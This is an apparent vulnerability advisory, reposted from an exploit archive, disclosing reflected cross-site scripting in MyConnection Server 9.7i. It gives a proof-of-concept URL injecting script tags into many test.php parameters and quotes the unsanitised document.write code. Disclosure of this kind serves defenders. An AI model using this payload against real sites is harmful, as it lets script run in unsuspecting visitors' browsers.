MyConnection Server (MCS) 9.7i Cross Site Scripting Vulnerability

Author: 1N3
Website: http://treadstonesecurity.blogspot.ca
Vender Website: http://www.visualware.com/
Affected Product: MyConnection Server
Affected Version: 9.7i (others may also be vulnerable)

ABOUT:
MyConnection Server (MCS) delivers a broad range of support managed automated and user initiated self-help connection
testing and monitoring services directly via the browser to any online customer/location anywhere in the world. Due to a
failure to sanitize certain GET variables passed to the connection test page (usually test.php), it is possible to
inject client side javascript to run in the context of the user browsing the website. Several parameters including
testtype, ver, cm, map, lines, duration and others appear to be vulnerable.

POC:
http://scrubbedhost.com/test.php?testtype=1"><script>alert(1);</script>&codebase=myspeed.pathcom
.com&location=Canada:%20Toronto,%20ON&ver=1"><script>alert(1);</script>&cm=1">&l
t;script>alert(1);</script>&map=1"><script>alert(1);</script>&lines=1"><
script>alert(1);</script>&pps=1"><script>alert(1);</script>&bpp=1"><scri
pt>alert(1);</script>&codec=1"><script>alert(1);</script>&provtext=1"><s
cript>alert(1);</script>&provtextextra=11"><script>alert(1);</script>&provlink=1&qu
ot;><script>alert(1);</script>

VULNERABLE CODE:

* Both voiplines and testlength are written to the end user without being properly sanitized and thus vulnerable to
reflective XSS.

<td valign="top" width="30%"><b>Current
Settings</b>
<br>
<br>
<b>VoIP Lines Simulated</b>:
<script type="text/javascript"> document.write(voiplines); </script><br>
<b>Test Length</b>:
<script type="text/javascript"> document.write(testlength); </script><br>
<b>Codec</b>:
<script type="text/javascript"> if (codec == "g711") { document.write(nameg711); }
else { document.write(nameg729); }
</script><br>
</td>
<td align="left" width="70%">
<p align="center">
<script>

#  0day.today [2018-04-08]  #